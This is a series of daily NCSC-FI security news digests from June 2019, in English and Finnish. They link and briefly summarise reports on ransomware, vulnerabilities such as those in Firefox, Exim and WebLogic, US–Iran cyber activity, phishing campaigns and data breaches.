Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-24

How to remove Ryuk Ransomware (Uninstall guide)

csirt.cy/how-to-remove-ryuk-ransomware-uninstall-guide/ Ryuk ransomware is the cryptovirus that targets companies with large ransom demands to make more profit from one attack. However, ransomware can also affect everyday users and corrupt or delete their data. You need a thorough system scan to terminate the malware in time.. According to the latest news reports, Ryuk ransomware is still rapidly spreading throughout the Internet sphere and infecting users worldwide. The Federal Bureau of Investigation, also known as FBI, has made a research and found out that this cyber threat has launched dangerous attacks on more than 100 different types of businesses in The United States of America.

Cloudflare is Having an Outage Affecting Sites Everywhere

www.bleepingcomputer.com/news/technology/cloudflare-is-having-an-outage-affecting-sites-everywhere/ Cloudflare is currently suffering an outage this morning that is affecting web sites around the world. This outage is not affecting all regions and only certain domains, including BleepignComputer, so some of you will be able to see this article and others won’t until the issue is resolved. According to Cloudflare, over 16 million Internet sites utilize their services for performance enhancement, DDoS mitigation, or other features. Due to this an outage can have a large impact on the entire Internet. Cloudflare has opened an incident report for this outage title “Route Leak Impacting Cloudflare”.. See also: www.cloudflarestatus.com/incidents/46z55mdhg0t5,

www.theregister.co.uk/2019/06/24/cloudflare_route_leak/ and

isc.sans.edu/forums/diary/Extensive+BGP+Issues+Affecting+Cloudflare+and+possibly+others/25064/

Saitko sähköpostitse jonkun näistä tiedostoista? Ole varovainen

www.is.fi/digitoday/tietoturva/art-2000006149767.html Kaikkiin tuntemattomiin sähköpostitse tuleviin tiedostoihin tulee aina suhtautua varauksella. Tietoturvayhtiö Kaspersky Lab kehottaa kuitenkin harjoittamaan äärimmäistä varovaisuutta näiden neljän liitetiedostotyypin kohdalla. Tiedostotyypit: Zip ja rar, Office, Pdf sekä Iso- ja img.

Saitko suositusta palvelusta epäilyttävän sähköpostin? Tästä on kyse

www.tivi.fi/uutiset/tv/5107ff91-0ffa-4116-a8a3-71b485068309 Matkailusovellus TripAdvisor vaatii joitakin käyttäjiä vaihtamaan salasanansa. Toimenpide koskee niitä käyttäjiä, joiden kirjautumistiedot ovat löytyneet yleiseen tietoon tulleiden tietovuotojen seasta.

Varo, näin huijarit iskevät yrityksiin kesälomakaudella

www.yrittajat.fi/uutiset/609062-varo-nain-huijarit-iskevat-yrityksiin-kesalomakaudella Kesä on huijareiden kulta-aikaa, koska töissä on paljon sijaisia. Yrityksiin kohdistetaan sähköpostihuijauksia, valelaskuja ja ns. toimitusjohtajahuijauksia.

The Modern-Day Heist: IP Theft Techniques That Enable Attackers

threatpost.com/ip-theft-enables-attackers/145912/ One of the more commonly exploited vectors used by attackers today is poorly secured third-party supply-chain vendors. Adversaries often take aim at organizations that have unfettered access to a multitude of customers, to get a foothold inside their primary target.

Microsoft: We’re fighting Windows malware spread via Excel in email with bad macro

www.zdnet.com/article/microsoft-were-fighting-windows-malware-spread-via-excel-in-email-with-bad-macro/ Don’t enable macros, Microsoft warns, because a new malware campaign is aiming at fully patched Windows PCs.

Anonymous hacker exposed after dropping USB drive while throwing Molotov cocktail

www.zdnet.com/article/anonymous-hacker-exposed-after-dropping-usb-drive-while-throwing-molotov-cocktail/ In a bizarre investigation, Belgium police have identified a member of the Anonymous Belgium hacker collective while investigating an arson case at a local bank. The perpetrator, a 35-year-old man from the Belgian city of Roeselare, was initially arrested after throwing a Molotov cocktail at the Crelan Bank office in Rumbeke, a suburb of Roeselare, back in 2014.

User data stolen from human hacking forum Social Engineered, published on rival site

www.zdnet.com/article/user-data-stolen-from-human-hacking-forum-social-engineered-published-on-rival-site/ A forum dedicated to the art of social engineering, Social Engineered, has been compromised and its users’ data leaked on a rival website. The data breach occurred on June 13, 2019. The details of the forum users, including 89,000 unique email addresses linked to 55,000 forum account holders, usernames, IP addresses, and passwords stored as salted MD5 hashes were published and leaked online.. See also:

www.bleepingcomputer.com/news/security/social-engineering-forum-hacked-data-shared-on-leak-sites/

Election Security

www.schneier.com/blog/archives/2019/06/election_securi_3.html Stanford University’s Cyber Policy Center has published a long report on the security of US elections. Summary: it’s not good.

Managing insider threats context is critical

www.itproportal.com/features/managing-insider-threats-context-is-critical/ Insider threat is a complex risk to manage; context is required to separate malicious actors from careless employees. The topic of insider threat is fast rising up on the corporate agenda. While you might think a companys own employees would be less likely to pose security risks than external attackers, analysis by Computing has found that insider threat was a factor in half of reported breaches.

GandCrab Threat Actors Retire…Maybe

www.fortinet.com/blog/threat-research/gandcrab-threat-actors-retire.html GandCrab was a Ransomware-as-a-Service malware managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware. However, through a recent forum post, the GandCrab team has now publicly announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, considering how witty and novel this threat group has been throughout the course of their campaign, it wouldnt be a surprise if this retirement announcement was just another of their many public stunts. If theres one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another. In the meantime, FortiGuard Labs will continue to monitor for any new activities from this group.

The Return of the WiZard Vulnerability: Crooks Start Hitting

blog.yoroi.company/research/the-return-of-the-wizard-vulnerability-crooks-start-hitting/ In the past days, a really important issue has been disclosed to the public: Return of the WiZard vulnerability (ref. EW N030619, CVE-2019-10149). Such vulnerability affected a wide range of Exim servers, one of the main email server technologies, extremely diffused all around the globe and in Italy too.

Karu löydös Chrome-selaimesta: Näyttää kovasti vakoiluohjelmalta

www.is.fi/digitoday/art-2000006152557.html Lukemattomat seurantaohjelmistot tarkkailevat sinua verkossa. Moninaiset verkkosivut päästävät mainos- ja datayritykset kiinni käyttäjän selaushistoriaasi ja sijaintiisi tietokoneelle asennettavien evästetiedostojen avulla. Yksi selain suosii evästeitä kuitenkin muita enemmän. Maailman suosituin verkkoselain Chrome sallii oletuksena käyttäjän laajan tarkkailun. The Washington Postin kolumnisti kertoo löydöksistään, kun hän raotti Chromen konepeltiä. Chrome tarjoili vain yhden viikon käyttöjakson aikana yli 11000 seurantaan tarkoitettua evästettä. See also:

www.washingtonpost.com/technology/2019/06/21/google-chrome-has-become-surveillance-software-its-time-switch/

Virustorjunnat laitettiin viivalle suomalaistuote keräsi kehuja

www.tivi.fi/uutiset/tv/cf5371c4-0655-40af-9e60-12a7341ec43d Saksalainen Av-test laittoi suosituimmat Windows 10 – -virustorjuntaohjelmistot järjestykseen kolmella pääkriteerillä: suojaus, suorituskyky, ja käytettävyys. Kahdeksan testatuista ohjelmista sai täydet pisteet jokaisesta kategoriasta. Testit on kuitenkin tehty laboratotioympäristössä, tosimaailmassa erilaiset muuttujat voivat muuttaat tuloksia. Vaikka jokin ohjelma torjuikin virukset testissä sataprosenttisesti, ei se välttämättä pysty samaan kotioloissa.

Business Decision Makers Focus on the Wrong Security Issues

www.bleepingcomputer.com/news/security/business-decision-makers-focus-on-the-wrong-security-issues/ Individuals with security roles have a different opinion about the cloud threats organizations should be wary about and defend against than the more practical approaches actually seen in security incidents. The main worries among 1,250 decision makers on cloud-related security issues interviewed for a study commissioned by Symantec were data breaches and malware injection, yet statistical attack data tells a different story.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-23

U.S. Carried Out Cyberattacks on Iran

www.nytimes.com/2019/06/22/us/politics/us-iran-cyber-attacks.html United States Cyber Command on Thursday conducted online attacks against an Iranian intelligence group that American officials believe helped plan the attacks against oil tankers in recent weeks, according to people briefed on the operation. The intrusion occurred the same day President Trump called off a strike on Iranian targets like radar and missile batteries. But the online operation was allowed to go forward because it was intended to be below the threshold of armed conflict using the same shadow tactics that Iran has deployed. The online attacks, which had been planned for several weeks, were ultimately meant to be a direct response to both the tanker attacks this month and the downing of an American drone this week, according to the people briefed on the operations. Multiple computer systems were targeted, according to people briefed on the operations, including those believed to have been used by an Iranian intelligence group that helped plan the tanker attacks. A: See also:

news.yahoo.com/pentagon-secretly-struck-back-against-iranian-cyber-spies-targeting-us-ships-234520824.html,

www.washingtonpost.com/world/national-security/with-trumps-approval-pentagon-launched-cyber-strikes-against-iran/2019/06/22/250d3740-950d-11e9-b570-6416efdc0803_story.html,

www.kauppalehti.fi/uutiset/washington-post-yhdysvallat-teki-kyberiskun-iranin-ohjusjarjestelmiin/10dd83a3-5f1a-4282-b1e7-06e0cdc29294, http. www.is.fi/ulkomaat/art-2000006151539.html,

www.hs.fi/ulkomaat/art-2000006151551.html,

www.kaleva.fi/uutiset/ulkomaat/mediatiedot-yhdysvallat-teki-kyberiskun-iranin-sotilastietojarjestelmiin/822392/ ja

www.wsj.com/articles/u-s-launched-cyberattacks-on-iran-11561263454

DHS warns of spike in cyberattacks from Iran

www.washingtontimes.com/news/2019/jun/22/dhs-warns-spike-cyberattacks-iran/ Iranian computer hackers are ramping up attacks against U.S. targets, a top Department of Homeland Security official said Saturday. Christopher C. Krebs, the head of the DHS Cybersecurity and Infrastructure Security Agency, or CISA, issued a statement confirming recent reporting about Iranian hackers increasingly setting their sight on the U.S. as tensions flare between countries. CISA is aware of a recent rise in malicious cyber activity directed at United States industries and government agencies by Iranian regime actors and proxies, said Mr. Krebs. We will continue to work with our intelligence community and cybersecurity partners to monitor Iranian cyber activity share information, and take steps to keep America and our allies safe, he said. Iranian hackers are increasingly using wiper attacks to erase data stored on infected computers as opposed to just stealing it, Mr. Krebs added. These efforts are often enabled through common tactics like spear phishing, password spraying and credential stuffing. What might start as an account compromise, where you think you might just lose data, can quickly become a situation where youve lost your whole network, he warned. Individuals should defend themselves by exercising cybersecurity best practices and alert authorities of any suspected compromises, he said. CrowdStrike and FireEye, two private U.S. cybersecurity firms, both said Friday that they have witnessed an uptick in malicious activity in recent weeks traced to suspected Iranian government hackers. See also:

www.bloomberg.com/news/articles/2019-06-22/iran-increases-cyberattacks-on-the-u-s-amid-tensions-dhs-says,

www.bleepingcomputer.com/news/security/us-government-warns-of-data-wipers-used-in-iranian-cyberattacks/, https://twitter.com/CISAKrebs/status/1142520000135278594 ja

www.zdnet.com/article/dhs-cisa-warns-of-iranian-hackers-habit-of-deploying-data-wiping-malware/. Vinkit: www.us-cert.gov/ncas/tips

Tor Browser 8.5.3 Fixes a Sandbox Escape Vulnerability in Firefox

www.bleepingcomputer.com/news/software/tor-browser-853-fixes-a-sandbox-escape-vulnerability-in-firefox/ Tor Browser 8.5.3 has been released to fix a Sandbox Escape vulnerability in Firefox that was recently used as part of a targeted attack against cryptocurrency companies. As this vulnerability is actively being used, it is strongly advised that all Tor users upgrade to the latest version.. When starting Tor Browser, it should alert you if a new version is available. If you would like to perform a manual check, you can do so by going to Tor Browser menu -> Help -> About Tor Browser.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-22

NASA hacked because of unauthorized Raspberry Pi connected to its networkA:

www.zdnet.com/article/nasa-hacked-because-of-unauthorized-raspberry-pi-connected-to-its-network/ A report published this week by the NASA Office of Inspector General reveals that in April 2018 hackers breached the agency’s network and stole approximately 500 MB of data related to Mars missions. The point of entry was a Raspberry Pi device that was connected to the IT network of the NASA Jet Propulsion Laboratory (JPL) without authorization or going through the proper security review.

WeTransfer Security Incident Sent Files to the Wrong People

www.bleepingcomputer.com/news/security/wetransfer-security-incident-sent-files-to-the-wrong-people/ In an embarrassing security incident, the WeTransfer file sharing service announced that for two days it was sending it’s users shared files to the wrong people. As this service is used to transfer what are considered private, and potentially sensitive files, this could be a big privacy issue for affected users.

Data of 645k Oregonians exposed after nine DHS employees fell for a phishing attack

www.zdnet.com/article/data-of-645k-oregonians-exposed-after-nine-dhs-employees-fell-for-a-phishing-attack/ The personal information of over 645,000 Oregonians who signed up for benefits with the state’s Department of Human Services (DHS) was inadvertently exposed to hackers after nine DHS employees were fooled by phishing emails. The phishing attack happened on January 8, 2019, according to a news release from the Oregon DHS this week.

PoC Released for Outlook Flaw that Microsoft Patched 6 Month After Discovery

thehackernews.com/2019/06/microsoft-outlook-vulnerability.html As we reported two days ago, Microsoft this week released an updated version of its Outlook app for Android that patches a severe remote code execution vulnerability (CVE-2019-1105) that impacted over 100 million users. However, at that time, very few details of the flaw were available in the advisory, which just revealed that the earlier versions of the email app contained a cross-site scripting (XSS) flaw that could allow attackers to run scripts in the context of the current user just by sending a specially crafted email to the victims. Now, Bryan Appleby from F5 Networks, one of the security researchers who reported this issue independently to Microsoft, released more details and proof-of-concept for the Outlook vulnerability that he reported to the tech giant almost six months ago.. See also:

www.f5.com/labs/articles/threat-intelligence/how-i-hacked-the-microsoft-outlook-android-app-and-found-cve-2019-1105

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-21

Iranian Hackers Launch a New US-Targeted Campaign as Tensions Mount

www.wired.com/story/iran-hackers-us-phishing-tensions/ WHEN TWO COUNTRIES begin to threaten war in 2019, it’s a safe bet that they’ve already been hacking each other’s networks. Right on schedule, three different cybersecurity firms now say they’ve watched Iran’s hackers try to gain access to a wide array of US organizations over the past few weeks, just as military tensions between the two countries rise to a breaking pointthough it’s not yet clear whether those hacker intrusions are aimed at intelligence gathering, laying the groundwork for a more disruptive cyberattack, or both.

Desjardins, Canada’s largest credit union, announces security breach

www.zdnet.com/article/desjardins-canadas-largest-credit-union-announces-security-breach/ Data for 2.9 million bank members was taken from the bank’s system by a now-fired employee.

Millions of Windows Dell PCs need patching: Give-me-admin security gremlin found lurking in bundled support tool

www.theregister.co.uk/2019/06/20/dell_supportassist_security_hole/ Dell’s troubleshooting software SupportAssist, bundled with the US tech titan’s home and business computers, has a security flaw that can be exploited by malware and rogue logged-in users to gain administrator powers.. See also:

thehackernews.com/2019/06/dells-supportassist-hacking.html

Verkkorikolliset vaanivat lomasijaisia kannattaa panostaa ennaltaehkäisyyn

www.tivi.fi/uutiset/tv/0d6ce3a6-5640-47cb-97bb-cd4c52733f3f Yritys on haavoittuvimmillaan huijauksille kesäaikaan, sillä lomasijaiset eivät välttämättä ole perillä kaikista laskutukseen liittyvistä käytännöistä. Yleisin huijaustyypeistä on niin sanottu Office 365-huijaus.

Uusi pirullinen hyökkäys saa ihmiset klikkaamaan ja antamaan tietonsa Hyvin tehokas juoni

www.is.fi/digitoday/tietoturva/art-2000006149749.html?ref=rss Huijarit ovat houkutelleet klikkailemaan linkkejä Googlen kalenteri-ilmoituksilla.

Firefox 67.0.4 Released Mozilla Patches Second 0-Day Flaw This Week

thehackernews.com/2019/06/firefox-0day-vulnerability.html Okay, folks, it’s time to update your Firefox web browser once againyes, for the second time this week.. See also:

threatpost.com/mozilla-fixes-second-actively-exploited-firefox-flaw/145893/

Lahden kaupunki on toipumassa kyberhyökkäyksestä jälkiä korjataan vielä juhannuksen jälkeen

yle.fi/uutiset/3-10837940 Lahden kaupunki on päässyt toipumisvaiheeseen viime viikkoisen kyberhyökkäyksen jälkeen, kerrotaan kaupungin tietohallinnosta. Työtä sähköisten palveluiden palauttamisessa riittää ainakin juhannuksen jälkeiselle viikolle.

Kiinan vakoojat esiintyvät kykyjenetsijöinä ja konsultteina LinkedInissä: suomalaistutkijan julkaisu kertoo, kuinka kohde koukutetaan luovuttamaan luottamuksellista tietoa

www.hs.fi/ulkomaat/art-2000006150040.html Tutkija Mika Aaltola kertoo Ulkopoliittisen instituutin tuoreessa julkaisussa, kuinka Kiinan vakoojat lähestyvät kohteitaan verkostoitumispalvelu LinkedInissä.

How to Remove the Chromium Virus

www.pandasecurity.com/mediacenter/malware/chromium-virus/ The Chromium virus is a malicious web browser that is created using the Chromium code. It is able to overwrite the Chrome browser and replace the original shortcuts with fake ones. It can change the search engine default on your browser so that youre directed to fake sponsored search results, and it can also control your apps, themes and extensions.

Backdoor Built into Android Firmware

www.schneier.com/blog/archives/2019/06/backdoor_built_.html In 2017, some Android phones came with a backdoor pre-installed: Criminals in 2017 managed to get an advanced backdoor preinstalled on Android devices before they left the factories of manufacturers, Google researchers confirmed on Thursday.

New Bird Miner malware targets Mac pirates

www.zdnet.com/article/new-bird-miner-cryptocurrency-miner-targets-mac-pirates/ The malware emulates Linux in its quest for cryptocurrency. A new variant of cryptocurrency mining malware called Bird Miner designed for Apple Mac is targeting users of pirated software.

Steam Phishing Campaign Steals Credentials, Hijacks Accounts

www.bleepingcomputer.com/news/security/steam-phishing-campaign-steals-credentials-hijacks-accounts/ A new phishing campaign is doing the rounds on the Steam game distribution platform, attempting to trick people into handing over their credentials via a roulette-style game promising free keys. The fraudsters funnel the Steam users to the phishing websites with the help of a redirector domain which is hidden behind a URL shortened using t.co, Twitter’s link-shortening service. The phishing sites are promoted on the Steam platform using already hijacked accounts which deliver the shortened URLs to their friend list using the Steam chat.

New LooCipher Ransomware Spreads Its Evil Through Spam

www.bleepingcomputer.com/news/security/new-loocipher-ransomware-spreads-its-evil-through-spam/ A new ransomware called LooCipher has been discovered that is actively being used in the wild to infect users. While it is not known exactly how this ransomware is being distributed, based on some of the files that were found, we believe it is through a spam campaign.

BlueKeep Warnings Pay Off, Boost Patching in Enterprise Networks

www.bleepingcomputer.com/news/security/bluekeep-warnings-pay-off-boost-patching-in-enterprise-networks/ The multiple warnings about patching Windows systems against the BlueKeep vulnerability (CVE-2019-0708) have not gone unheeded. Administrators of enterprise networks listened and updated most of the machines affected by the issue.

Microsoft Warns of Campaign Dropping Flawedammyy RAT in Memory

www.bleepingcomputer.com/news/security/microsoft-warns-of-campaign-dropping-flawedammyy-rat-in-memory/ Microsoft issued a warning about an active spam campaign that tries to infect Korean targets with a FlawedAmmyy RAT malware distributed via malicious XLS attachments. The Microsoft Security Intelligence Twitter account explained in a thread that a currently active campaign “employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory.”. Attacks will start after the victims open the attached .xls file that “automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory.”

Sodinokibi Ransomware Spreads Wide via Hacked MSPs, Sites, and Spam

www.bleepingcomputer.com/news/security/sodinokibi-ransomware-spreads-wide-via-hacked-msps-sites-and-spam/ With the GandCrab Ransomware operation shutting down, affiliates are looking to fill the hole left behind with other ransomware. Such is the case with the Sodinokibi Ransomware, whose affiliates are using a wide range of tactics to distribute the ransomware and earn a commission.

This botnet exploits Android Debug Bridge to mine cryptocurrency on your device

www.zdnet.com/article/this-botnet-spreads-through-ssh-to-mine-for-cryptocurrency/ A new botnet is making the rounds by abusing Android Debug Bridge (ADB) and SSH to enslave new Android devices to its network.

OpenSSH gets protection against attacks like Spectre, Meltdown, Rowhammer, and Rambleed

www.zdnet.com/article/openssh-gets-protection-against-attacks-like-spectre-meltdown-rowhammer-and-rambleed/ The OpenSSH project is getting protection against side-channel attacks that are known to leak data from a computer’s memory, and allow malicious threat actors to steal sensitive information.

Free proxy service found running on top of 2,600+ hacked WordPress sites

www.zdnet.com/article/free-proxy-service-found-running-on-top-of-2600-hacked-wordpress-sites/ A website offering both free and commercial proxy servers is actually running on top of a giant botnet of hacked WordPress sites, security researchers from Netlab, a network threat hunting unit of Chinese cyber-security giant Qihoo 360, have revealed. In a report published today, Netlab researchers accused the Free-Socks.in proxy service of masquerading as a front for a criminal operation. Researchers said that users who would use any of the proxy servers provided by the Free-Socks.in website would actually have their traffic funneled through a network of hacked WordPress sites spread all over the world.

Microsoft Outlook for Android Open to XSS Attacks

threatpost.com/microsoft-outlook-android-xss/145924/ A spoofing bug (CVE-2019-1105) can open the door to an email attack chain. Microsoft has patched a vulnerability in Microsoft Outlook for Android, which opens the door to cross-site scripting (XSS) attacks. The software giant said that CVE-2019-1105, rated important, is a spoofing vulnerability that exists in the way Microsoft Outlook for Android software parses specifically crafted email messages.

CVE-2019-8635: Double Free Vulnerability in Apple macOS Lets Attackers Escalate System Privileges and Execute Arbitrary Code

blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-8635-double-free-vulnerability-in-apple-macos-lets-attackers-escalate-system-privileges-and-execute-arbitrary-code/ We discovered a double free vulnerability (assigned as CVE-2019-8635) in macOS. The vulnerability is caused by a memory corruption flaw in the AMD component. If successfully exploited, an attacker can implement privilege escalation and execute malicious code on the system with root privileges. We disclosed our findings to Apple, which has since released a patch. See also:

support.apple.com/en-us/HT210119

Beware! Playing Untrusted Videos On VLC Player Could Hack Your Computer

thehackernews.com/2019/06/vlc-media-player-hacking.html If you use VLC media player on your computer and haven’t updated it recently, don’t you even dare to play any untrusted, randomly downloaded video file on it.

Categories
NCSC-FI News followup

Daily NCSC-FI news followup 2019-06-20

Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments

www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments Waterbug may have hijacked a separate espionage groups infrastructure during one attack against a Middle Eastern target.. The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage groups infrastructure.

DanaBot Banking Trojan Upgraded with Non Ransomware Module

www.bleepingcomputer.com/news/security/danabot-banking-trojan-upgraded-with-non-ransomware-module/ A new malicious campaign is distributing an upgraded variant of DanaBot that comes with a new ransomware module used to target potential victims from Italy and Poland via phishing emails which deliver malware droppers.. As initially discovered by Proofpoint researchers in May 2018, DanaBot is a modular banking Trojan developed in Delphi and designed to steal banking credentials and sensitive information by collecting form data, taking screenshots, or logging keystrokes on compromised computers.. See also:

research.checkpoint.com/danabot-demands-a-ransom-payment/ and

threatpost.com/danabot-ransomware-arsenal/145863/

Firefox zero-day was used in attack against Coinbase employees, not its users

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/ There were actually two zero-days — not one — combined into an exploit used in a spear-phishing attempt. Other cryptocurrency organizations were also targeted. A recent Firefox zero-day that has made headlines across the tech news world this week was actually used in attacks against Coinbase employees, and not the company’s users, ZDNet has learned. See also:

www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/,

www.bleepingcomputer.com/news/security/mozilla-firefox-6704-fixes-second-actively-exploited-zero-day/ and

www.bleepingcomputer.com/news/security/firefox-0-day-used-in-targeted-attacks-against-cryptocurrency-firms/

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-mining-botnet-arrives-through-adb-and-spreads-through-ssh/ We observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread via SSH. This attack takes advantage of the way open ADB ports dont have authentication by default, similar to the Satori botnet variant we previously reported. This botnets design allows it to spread from the infected host to any system that has had a previous SSH connection with the host. The use of ADB makes Android-based devices susceptible to the malware. We detected activity from this botnet in 21 different countries, with the highest percentage found in South Korea.

Cisco critical-flaw warning: These two bugs in our data-center gear need patching now

www.zdnet.com/article/cisco-critical-flaw-warning-these-two-bugs-in-our-data-center-gear-need-patching-now/ Cisco is warning enterprise admins to install security updates for two critical flaws. Networking giant Cisco has disclosed two critical vulnerabilities affecting core equipment in the data center that could give determined attackers an avenue to break into networks. Cisco’s Digital Network Architecture (DNA) Center appliance has once again been found to be vulnerable to an authentication bypass, which could allow an “adjacent” attacker to skip authentication and cause damage to an organization’s critical internal services. The flaw, tagged as CVE-2019-1848, is because Cisco didn’t sufficiently restrict access to ports used to operate the system. The vulnerability would allow an attacker to connect an unauthorized device to the network. See also:

tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-dnac-bypass and threatpost.com/cisco-dna-center-critical-flaw/145849/

Google takes the PIS out of advertising: New algo securely analyzes shared encrypted data sets without leaking contents

www.theregister.co.uk/2019/06/19/google_pis_encryption/ Google on Wednesday released source code for a project called Private Join and Compute that allows two parties to analyze and compare shared sets of data without revealing the contents of each set to the other party. This is useful if you want to see how your private encrypted data set of, say, ad-clicks-to-sales conversion rates, correlates to someone else’s encrypted conversion rate data set without disclosing the actual numbers to either side. This particular technique is a type of secure multiparty computation that builds upon a cryptographic protocol called Private Set-Intersection (PSI). Google employs this approach in a Chrome extension called Password Checkup that lets users test logins and passwords against a dataset of compromised credentials without revealing the query to the internet goliath. See also

threatpost.com/google-computational-privacy/145835/ and

www.theregister.co.uk/2019/06/19/google_pis_encryption/

Samba Vulnerability Can Crash Active Directory Components

www.bleepingcomputer.com/news/security/samba-vulnerability-can-crash-active-directory-components/ A couple of bugs in some versions of Samba software can help an attacker crash key processes on the network in charge of accessing directory, application, and server services. The two vulnerabilities can be leveraged separately to crash the LDAP (Lightweight Directory Access Protocol) and the RPC (remote procedural call) server processes in Samba Active Directory Domain Controller, supported since version 4.0 of the software

The U.S. Loses Over $1.5 Trillion in a Decade of Data Breaches

www.bleepingcomputer.com/news/security/the-us-loses-over-15-trillion-in-a-decade-of-data-breaches/ A decade’s collection of data breaches shows a bleak picture with billions of records exposed in this type of incidents and financial damages of more than $1.6 trillion. Data collected from public sources reveal that since 2008 there were close to 9,700 breach events in the U.S., involving more than 10.7 billion records, with an average cost calculated in 2018 at $148 per record.

ISC Releases BIND Security Updates

www.us-cert.gov/ncas/current-activity/2019/06/19/ISC-Releases-BIND-Security-Updates The Internet Systems Consortium (ISC) has released updates that address a vulnerability in versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to cause a denial-of-service condition. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ISC advisory for CVE-2019-6471 and apply the necessary updates.

Check Points Threat Emulation Stops Large-Scale Phishing Campaign in Germany

blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/ During the first week of June 2019, Check Point researchers encountered a new, large-scale phishing campaign targeting German companies across all industries. The hackers goal was to install Remcos a remote control tool on the victims computers. The attackers initially sent fake emails that appeared to be from several legitimate companies across Germany. These emails contained invoices or urgent order attachments which were actually Remcos archives attempting to connect with the attackers command and control (C&C) server. See also

forensics.checkpoint.com/remcos_te/ThreatEmulationReport.html and forensics.checkpoint.com/remcos/index.html

Modular Plurox Malware Is a Wormable Backdoor Cryptominer

www.bleepingcomputer.com/news/security/modular-plurox-malware-is-a-wormable-backdoor-cryptominer/ A new modular backdoor malware strain capable of mining cryptocurrencies and of spreading to other machines on the local network with the help of SMB and UPnP plugins has been detected by Kaspersky security researchers. The backdoor malware named Plurox was discovered in February and it seems to be still in its testing phase given that it’s source code and the communication channels it uses to contact its command-and-control (C&C) server are not yet encrypted in any way. See also:

securelist.com/plurox-modular-backdoor/91213/

Feds: Cyberattack on NASAs JPL Threatened Mission-Control Data

threatpost.com/feds-hackers-mission-control-data-nasa-jpl/145842/ Rampant security-operations bungling allowed cyberattackers to infiltrate JPLs network, which carries human mission data.. NASAs Jet Propulsion Laboratory (JPL) may know how to send delicate equipment to Mars, but basic cybersecurity best practices appear to pose an issue for it. A comprehensive federal review has detailed an April 2018 security incident that compromised mission systems stemming from multiple IT security-control weaknesses exposing NASA systems and data. The review, released Tuesday and carried out by the U.S. Office of the Inspector General, said that the weaknesses reduce JPLs ability to prevent, detect and mitigate attacks targeting its systems and networks.. Specifically, poor practices when it comes to network segmentation and third parties were source of a cyberattack in April 2018, OIG said. See also oig.nasa.gov/docs/IG-19-022.pdf

Cryptominer Uses Cron To Reinfect Linux Host After Removal

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/ A cryptomining dropper malware has been spotted by security researchers while gaining persistence on Linux hosts by adding cron jobs to reinfect the compromised machines after being removed. The malware was initially discovered on a web server with a maxed out CPU by a malicious process, a sure sign of a host infected with cryptomining malware configured to use all available computing resources. As Sucuri’s security analyst Luke Leal found after taking a closer look, the cryptominer is downloaded by attackers using a Bash script dropped on the server via an unknown method most probably after exploiting an unpatched vulnerability, brute forcing their way in, or by phishing the admin credentials. See also:

blog.sucuri.net/2019/06/cryptomining-dropper-and-cronjob-creator.html and

www.bleepingcomputer.com/news/security/cryptominer-uses-cron-to-reinfect-linux-host-after-removal/

Oracle issues emergency update to patch actively exploited WebLogic flaw

arstechnica.com/information-technology/2019/06/oracle-issues-emergency-update-to-patch-actively-exploited-weblogic-flaw/ Oracle on Tuesday published an out-of-band update patching a critical code-execution vulnerability in its WebLogic server after researchers warned that the flaw was being actively exploited in the wild. The vulnerability, tracked as CVE-2019-2729, allows an attacker to run malicious code on the WebLogic server without any need for authentication. That capability earned the vulnerability a Common Vulnerability Scoring System score of 9.8 out of 10. The vulnerability is a deserialization attack targeting two Web applications that WebLogic appears to expose to the Internet by defaultwls9_async_response and wls-wsat.war. The flaw in Oracle’s WebLogic Java application servers came to light as a zero-day four days ago when it was reported by security firm KnownSec404. See also:

blog.yoroi.company/warning/nuova-vulnerabilita-in-oracle-weblogic/

Florida city pays $600,000 to ransomware gang to have its data back

www.zdnet.com/article/florida-city-pays-600000-to-ransomware-gang-to-have-its-data-back/ The city council for Riviera Beach, Florida, voted this week to pay more than $600,000 to a ransomware gang so city officials could recover data that has been locked and encrypted more than three weeks ago. See also:

www.tivi.fi/uutiset/tv/33c14270-e69b-4c9b-a8d0-92e8448e8074

Turkulaisen Helin, 42, tulostimesta pullahti yllättäen naapurin lasku Miten kummassa se on mahdollista?

www.is.fi/digitoday/art-2000006148351.html?ref=rss Päivittämättömät tulostimet saattavat päästää sivulliset tulostelemaan vapaasti. Valmistaja sanoo korjailleensa asiaa myöhemmin päivityksillä. Suoratulostussovellus kertoo, minkä nimiseen laitteeseen ollaan tulostamassa. Jos lähekkäin on kaksi samanlaista laitetta, niiden eron huomaa kuitenkin vain tulostimen verkon nimessä olevan laitekohtaisen tunnisteen perusteella. Tämän näkee vain etsimällä sen tulostimen asetuksista.

Tor Browser 8.5.2 Released to Fix Critical Vulnerability

